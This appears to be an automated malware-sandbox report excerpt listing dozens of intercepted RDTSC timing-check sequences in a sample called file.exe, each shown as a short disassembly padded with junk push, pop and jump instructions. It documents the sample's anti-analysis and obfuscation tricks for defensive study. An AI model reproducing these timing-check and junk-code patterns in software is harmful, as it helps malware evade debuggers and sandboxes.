                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6845E second address: E6848A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edx 0x00000006 pop eax 0x00000007 mov eax, dword ptr [eax] 0x00000009 jmp 00007F60F12493B5h 0x0000000e mov dword ptr [esp+04h], eax 0x00000012 jbe 00007F60F12493B4h 0x00000018 push eax 0x00000019 push edx 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68691 second address: E686C3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F60F1137216h 0x0000000a popad 0x0000000b pop ecx 0x0000000c push eax 0x0000000d pushad 0x0000000e jmp 00007F60F1137224h 0x00000013 pushad 0x00000014 jmp 00007F60F113721Dh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68E84 second address: E68E99 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68E99 second address: E68EA3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jno 00007F60F1137216h 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F38E second address: E9F394 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F394 second address: E9F398 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F4D0 second address: E9F528 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jp 00007F60F12493ACh 0x00000010 pushad 0x00000011 jmp 00007F60F12493B8h 0x00000016 push edx 0x00000017 pop edx 0x00000018 push esi 0x00000019 pop esi 0x0000001a popad 0x0000001b popad 0x0000001c push eax 0x0000001d push edx 0x0000001e jnl 00007F60F12493C1h 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E9F91E second address: E9F924 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1B5A9 second address: E1B5B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60F12493A6h 0x0000000a popad 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA557A second address: EA5582 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5582 second address: EA5587 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5587 second address: EA55D6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F60F113722Eh 0x00000008 jmp 00007F60F1137226h 0x0000000d pushad 0x0000000e popad 0x0000000f jmp 00007F60F113721Ch 0x00000014 pop edx 0x00000015 pop eax 0x00000016 jbe 00007F60F1137263h 0x0000001c push eax 0x0000001d push edx 0x0000001e jmp 00007F60F113721Bh 0x00000023 jmp 00007F60F113721Eh 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5AB6 second address: EA5AD6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 jns 00007F60F12493A6h 0x0000000d popad 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edx 0x00000012 jp 00007F60F12493AEh 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5AD6 second address: EA5ADC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5ADC second address: EA5AE2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5AE2 second address: EA5AE6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5AE6 second address: EA5AEF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5C4B second address: EA5C5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F113721Bh 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA5C5A second address: EA5C62 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA63E5 second address: EA63EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA63EB second address: EA63F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA6667 second address: EA6685 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F60F1137227h 0x00000008 pop esi 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA8E9D second address: EA8EC3 instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F12493A6h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b pushad 0x0000000c popad 0x0000000d jnc 00007F60F12493A6h 0x00000013 jmp 00007F60F12493B2h 0x00000018 popad 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EA8FEE second address: EA9016 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop ecx 0x00000007 jno 00007F60F1137218h 0x0000000d popad 0x0000000e push eax 0x0000000f pushad 0x00000010 jmp 00007F60F113721Ch 0x00000015 push eax 0x00000016 pop eax 0x00000017 ja 00007F60F1137216h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAC372 second address: EAC376 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EAC376 second address: EAC37C instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABC35 second address: EABC58 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F60F12493B2h 0x0000000b popad 0x0000000c push eax 0x0000000d push edx 0x0000000e jns 00007F60F12493A6h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABC58 second address: EABC5C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABC5C second address: EABC6F instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493ADh 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EABF25 second address: EABF3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007F60F1137223h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB03BD second address: EB03E5 instructions: 0x00000000 rdtsc 0x00000002 jc 00007F60F12493A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c js 00007F60F12493ACh 0x00000012 jl 00007F60F12493A6h 0x00000018 popad 0x00000019 push eax 0x0000001a push edx 0x0000001b push ebx 0x0000001c pushad 0x0000001d popad 0x0000001e jo 00007F60F12493A6h 0x00000024 pop ebx 0x00000025 pushad 0x00000026 push eax 0x00000027 push edx 0x00000028 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB03E5 second address: EB03EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edx 0x00000005 pop edx 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB03EE second address: EB03F3 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB03F3 second address: EB041A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edi 0x00000007 push eax 0x00000008 push edx 0x00000009 jne 00007F60F1137216h 0x0000000f jmp 00007F60F1137228h 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB041A second address: EB041E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB06AC second address: EB06B9 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pushad 0x00000004 popad 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 pushad 0x00000009 push eax 0x0000000a push edx 0x0000000b pushad 0x0000000c popad 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB0C43 second address: EB0C57 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493AFh 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4DFE second address: EB4E02 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4E02 second address: EB4E1F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F12493B4h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E1143A second address: E11440 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB45F2 second address: EB4603 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F60F12493A6h 0x0000000a jne 00007F60F12493A6h 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4603 second address: EB4608 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4608 second address: EB461A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 pop edx 0x00000006 pop eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a jp 00007F60F12493A6h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB461A second address: EB4638 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 popad 0x00000007 jmp 00007F60F1137227h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4638 second address: EB463E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4760 second address: EB4786 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F1137216h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a jnp 00007F60F113722Ch 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4786 second address: EB478C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB478C second address: EB47A2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137222h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB4AA2 second address: EB4AAC instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F60F12493A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB939C second address: EB93AB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jo 00007F60F113721Eh 0x0000000b push edx 0x0000000c pop edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB969E second address: EB96C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F60F12493B0h 0x00000009 jmp 00007F60F12493B5h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB96C7 second address: EB96FA instructions: 0x00000000 rdtsc 0x00000002 ja 00007F60F1137216h 0x00000008 js 00007F60F1137216h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 pop edx 0x00000011 pop eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jg 00007F60F1137223h 0x0000001a jmp 00007F60F113721Dh 0x0000001f jmp 00007F60F113721Ch 0x00000024 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9854 second address: EB9860 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 jne 00007F60F12493A6h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9860 second address: EB9864 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9864 second address: EB9874 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jl 00007F60F12493ACh 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB99BF second address: EB99CA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 pushad 0x00000008 popad 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB99CA second address: EB99CE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9AE3 second address: EB9B0A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnl 00007F60F1137216h 0x0000000a pushad 0x0000000b popad 0x0000000c push esi 0x0000000d pop esi 0x0000000e popad 0x0000000f pop ebx 0x00000010 pushad 0x00000011 push edi 0x00000012 je 00007F60F1137216h 0x00000018 pop edi 0x00000019 push ebx 0x0000001a pushad 0x0000001b popad 0x0000001c push ecx 0x0000001d pop ecx 0x0000001e pop ebx 0x0000001f js 00007F60F113721Ch 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E688D6 second address: E688DA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E688DA second address: E6891F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F60F1137229h 0x0000000b popad 0x0000000c nop 0x0000000d add dword ptr [ebp+12465119h], esi 0x00000013 mov ebx, dword ptr [ebp+124897B8h] 0x00000019 movsx edx, bx 0x0000001c mov dword ptr [ebp+122D38A8h], ecx 0x00000022 add eax, ebx 0x00000024 mov dx, di 0x00000027 nop 0x00000028 jc 00007F60F1137224h 0x0000002e pushad 0x0000002f push eax 0x00000030 push edx 0x00000031 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6891F second address: E68925 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68925 second address: E68969 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 jmp 00007F60F113721Bh 0x0000000b nop 0x0000000c and edi, dword ptr [ebp+12450EDFh] 0x00000012 push 00000004h 0x00000014 push 00000000h 0x00000016 push ecx 0x00000017 call 00007F60F1137218h 0x0000001c pop ecx 0x0000001d mov dword ptr [esp+04h], ecx 0x00000021 add dword ptr [esp+04h], 00000015h 0x00000029 inc ecx 0x0000002a push ecx 0x0000002b ret 0x0000002c pop ecx 0x0000002d ret 0x0000002e mov edi, dword ptr [ebp+122D2B14h] 0x00000034 push eax 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68969 second address: E6896D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E6896D second address: E68973 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E68973 second address: E68979 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EB9C50 second address: EB9C86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 popad 0x00000007 jc 00007F60F113721Ch 0x0000000d jbe 00007F60F1137216h 0x00000013 jo 00007F60F113721Ah 0x00000019 pushad 0x0000001a popad 0x0000001b pushad 0x0000001c popad 0x0000001d popad 0x0000001e push eax 0x0000001f push edx 0x00000020 push ebx 0x00000021 jmp 00007F60F1137224h 0x00000026 pop ebx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0930 second address: EC093C instructions: 0x00000000 rdtsc 0x00000002 jnp 00007F60F12493A6h 0x00000008 push edi 0x00000009 pop edi 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC093C second address: EC096D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pushad 0x00000004 popad 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 jnp 00007F60F113723Fh 0x0000000e jmp 00007F60F113721Dh 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F60F1137222h 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0BEC second address: EC0BF0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC0E76 second address: EC0E82 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 pop edi 0x00000008 push eax 0x00000009 push edx 0x0000000a push edi 0x0000000b pop edi 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC19C6 second address: EC19CC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC19CC second address: EC19D0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC19D0 second address: EC19DA instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F60F12493A6h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC19DA second address: EC19EB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 je 00007F60F1137216h 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6306 second address: EC6310 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F12493B2h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6310 second address: EC6316 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6457 second address: EC645C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6775 second address: EC6781 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pop edi 0x00000004 jng 00007F60F1137216h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6781 second address: EC6787 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6787 second address: EC67A4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F60F1137229h 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC67A4 second address: EC67CF instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F12493B7h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F60F12493AEh 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6935 second address: EC6939 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6939 second address: EC693F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6A68 second address: EC6A6E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6DAE second address: EC6DBA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jl 00007F60F12493A6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EC6DBA second address: EC6DC0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED5259 second address: ED525F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED525F second address: ED5265 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3248 second address: ED3254 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F60F12493A6h 0x00000008 push eax 0x00000009 pop eax 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3254 second address: ED3265 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 pushad 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 jg 00007F60F1137216h 0x0000000d pushad 0x0000000e popad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3732 second address: ED3736 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED3736 second address: ED373C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED373C second address: ED374A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jl 00007F60F12493ACh 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED374A second address: ED3758 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 pushad 0x00000007 popad 0x00000008 jc 00007F60F1137216h 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED38C0 second address: ED38C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED38C5 second address: ED38E6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F60F1137224h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c jns 00007F60F1137216h 0x00000012 rdtsc
